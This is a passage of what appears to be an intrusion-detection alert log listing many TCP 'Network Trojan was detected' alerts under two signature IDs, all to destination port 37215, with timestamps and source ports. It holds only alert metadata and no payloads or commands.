          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021116
          SID:2835222
          Source Port:34696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175903
          SID:2829579
          Source Port:41820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269810
          SID:2829579
          Source Port:59612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739778
          SID:2829579
          Source Port:40280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351162
          SID:2835222
          Source Port:57846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175996
          SID:2829579
          Source Port:39562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135983
          SID:2835222
          Source Port:58350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512921
          SID:2835222
          Source Port:51688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462782
          SID:2829579
          Source Port:54132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884275
          SID:2835222
          Source Port:34558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153831
          SID:2829579
          Source Port:43652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784443
          SID:2835222
          Source Port:46326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354300
          SID:2835222
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795180
          SID:2829579
          Source Port:53246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460622
          SID:2829579
          Source Port:38474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742891
          SID:2835222
          Source Port:55172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404645
          SID:2829579
          Source Port:58852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087886
          SID:2829579
          Source Port:45920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037351
          SID:2829579
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893924
          SID:2835222
          Source Port:35470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741957
          SID:2835222
          Source Port:53642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471525
          SID:2835222
          Source Port:59232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172761
          SID:2829579
          Source Port:42114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736606
          SID:2835222
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470682
          SID:2829579
          Source Port:38480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408878
          SID:2835222
          Source Port:39098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513600
          SID:2829579
          Source Port:39178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555203
          SID:2829579
          Source Port:60332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177341
          SID:2835222
          Source Port:32776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021960
          SID:2835222
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796497
          SID:2829579
          Source Port:53414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798453
          SID:2829579
          Source Port:36738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108547
          SID:2835222
          Source Port:46968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892537
          SID:2835222
          Source Port:37862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595078
          SID:2829579
          Source Port:42650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043520
          SID:2829579
          Source Port:39792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116632
          SID:2835222
          Source Port:57936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911726
          SID:2829579
          Source Port:57646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467662
          SID:2835222
          Source Port:56600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747911
          SID:2829579
          Source Port:48350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740887
          SID:2829579
          Source Port:39110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862672
          SID:2835222
          Source Port:33198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354200
          SID:2829579
          Source Port:45170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801153
          SID:2835222
          Source Port:50194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672830
          SID:2835222
          Source Port:42358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512281
          SID:2829579
          Source Port:55888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099488
          SID:2829579
          Source Port:47846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271563
          SID:2829579
          Source Port:56530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896986
          SID:2835222
          Source Port:55646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153010
          SID:2835222
          Source Port:52936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166616
          SID:2835222
          Source Port:51068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827760
          SID:2829579
          Source Port:57510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158813
          SID:2835222
          Source Port:48338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792063
          SID:2835222
          Source Port:54080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180369
          SID:2829579
          Source Port:54794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153215
          SID:2829579
          Source Port:42222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160683
          SID:2835222
          Source Port:50498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403863
          SID:2835222
          Source Port:50594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446624
          SID:2829579
          Source Port:43034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107795
          SID:2829579
          Source Port:50692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892130
          SID:2829579
          Source Port:33552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788158
          SID:2829579
          Source Port:46308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789833
          SID:2829579
          Source Port:43530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269263
          SID:2835222
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822575
          SID:2829579
          Source Port:56666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860163
          SID:2829579
          Source Port:57156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731290
          SID:2829579
          Source Port:46586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172688
          SID:2829579
          Source Port:39276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673764
          SID:2835222
          Source Port:49038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.360889
          SID:2835222
          Source Port:44208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407030
          SID:2835222
          Source Port:40668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233658
          SID:2835222
          Source Port:44992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109371
          SID:2835222
          Source Port:54122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260734
          SID:2835222
          Source Port:44472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355800
          SID:2829579
          Source Port:34844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495817
          SID:2835222
          Source Port:41628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356125
          SID:2835222
          Source Port:46034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552120
          SID:2835222
          Source Port:55710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165595
          SID:2835222
          Source Port:44578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495734
          SID:2829579
          Source Port:44542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461359
          SID:2829579
          Source Port:49534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.149914
          SID:2829579
          Source Port:53430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549313
          SID:2829579
          Source Port:49620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471444
          SID:2835222
          Source Port:58358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.883895
          SID:2829579
          Source Port:49774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240016
          SID:2829579
          Source Port:38022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465905
          SID:2829579
          Source Port:39600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266321
          SID:2829579
          Source Port:46588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837177
          SID:2835222
          Source Port:38498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862393
          SID:2835222
          Source Port:46890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669652
          SID:2835222
          Source Port:38816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108157
          SID:2829579
          Source Port:53564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808816
          SID:2835222
          Source Port:45614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854184
          SID:2829579
          Source Port:34824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517452
          SID:2835222
          Source Port:60066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463320
          SID:2829579
          Source Port:40954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150368
          SID:2835222
          Source Port:60728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108316
          SID:2835222
          Source Port:33728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353393
          SID:2829579
          Source Port:35634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355170
          SID:2835222
          Source Port:33932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799420
          SID:2829579
          Source Port:42704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893809
          SID:2829579
          Source Port:53594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.835544
          SID:2835222
          Source Port:51862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449766
          SID:2829579
          Source Port:37390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174536
          SID:2835222
          Source Port:35410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788330
          SID:2829579
          Source Port:36114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179300
          SID:2835222
          Source Port:56902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131159
          SID:2829579
          Source Port:50742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177237
          SID:2835222
          Source Port:48044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704153
          SID:2829579
          Source Port:58962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264242
          SID:2829579
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744743
          SID:2829579
          Source Port:60828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744858
          SID:2829579
          Source Port:33760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262676
          SID:2829579
          Source Port:47008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797534
          SID:2829579
          Source Port:57568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462882
          SID:2835222
          Source Port:53400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517247
          SID:2829579
          Source Port:44718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351862
          SID:2835222
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403522
          SID:2829579
          Source Port:40848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843974
          SID:2829579
          Source Port:52712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015817
          SID:2835222
          Source Port:45738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708609
          SID:2835222
          Source Port:43778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602704
          SID:2829579
          Source Port:41570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356896
          SID:2829579
          Source Port:46030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464116
          SID:2829579
          Source Port:47320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115193
          SID:2829579
          Source Port:35072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242957
          SID:2835222
          Source Port:56792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258006
          SID:2829579
          Source Port:54152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787854
          SID:2829579
          Source Port:47912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732665
          SID:2829579
          Source Port:59004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792788
          SID:2835222
          Source Port:40480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741815
          SID:2829579
          Source Port:52208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355232
          SID:2829579
          Source Port:56320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111827
          SID:2835222
          Source Port:53614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108624
          SID:2829579
          Source Port:35558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744154
          SID:2829579
          Source Port:43156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857444
          SID:2829579
          Source Port:52542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730233
          SID:2829579
          Source Port:36872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822946
          SID:2835222
          Source Port:36846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238643
          SID:2829579
          Source Port:49154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731190
          SID:2835222
          Source Port:58702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602981
          SID:2829579
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463943
          SID:2835222
          Source Port:56088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264877
          SID:2829579
          Source Port:41792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817125
          SID:2829579
          Source Port:58150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303206
          SID:2835222
          Source Port:35254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843886
          SID:2829579
          Source Port:41572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780230
          SID:2835222
          Source Port:54374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405019
          SID:2829579
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445903
          SID:2835222
          Source Port:33606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465977
          SID:2829579
          Source Port:59534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108932
          SID:2829579
          Source Port:42458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732726
          SID:2835222
          Source Port:47602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744775
          SID:2835222
          Source Port:45966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892511
          SID:2835222
          Source Port:37640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813515
          SID:2829579
          Source Port:60152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783094
          SID:2835222
          Source Port:58832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517094
          SID:2829579
          Source Port:57216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179785
          SID:2835222
          Source Port:42454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513255
          SID:2829579
          Source Port:50238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352417
          SID:2835222
          Source Port:43334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160300
          SID:2835222
          Source Port:42382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005753
          SID:2829579
          Source Port:36772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600192
          SID:2835222
          Source Port:59070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444820
          SID:2835222
          Source Port:41872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405040
          SID:2829579
          Source Port:51188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410005
          SID:2829579
          Source Port:53930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705999
          SID:2829579
          Source Port:52876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269921
          SID:2835222
          Source Port:39046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299803
          SID:2835222
          Source Port:44650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808952
          SID:2835222
          Source Port:37374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264327
          SID:2835222
          Source Port:34716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730153
          SID:2835222
          Source Port:47732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673431
          SID:2829579
          Source Port:56980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842226
          SID:2835222
          Source Port:44900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262431
          SID:2835222
          Source Port:35048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896121
          SID:2835222
          Source Port:33252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517963
          SID:2829579
          Source Port:50772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897055
          SID:2829579
          Source Port:43632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351450
          SID:2829579
          Source Port:45614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132906
          SID:2835222
          Source Port:33972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257676
          SID:2835222
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460234
          SID:2835222
          Source Port:48632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517390
          SID:2829579
          Source Port:41892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187988
          SID:2835222
          Source Port:47730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441970
          SID:2829579
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734582
          SID:2835222
          Source Port:50130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548042
          SID:2829579
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355890
          SID:2835222
          Source Port:44800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512291
          SID:2829579
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517830
          SID:2835222
          Source Port:49456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274330
          SID:2829579
          Source Port:38314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806695
          SID:2829579
          Source Port:36130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549292
          SID:2835222
          Source Port:47696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788819
          SID:2835222
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798046
          SID:2835222
          Source Port:51164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444967
          SID:2835222
          Source Port:57422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
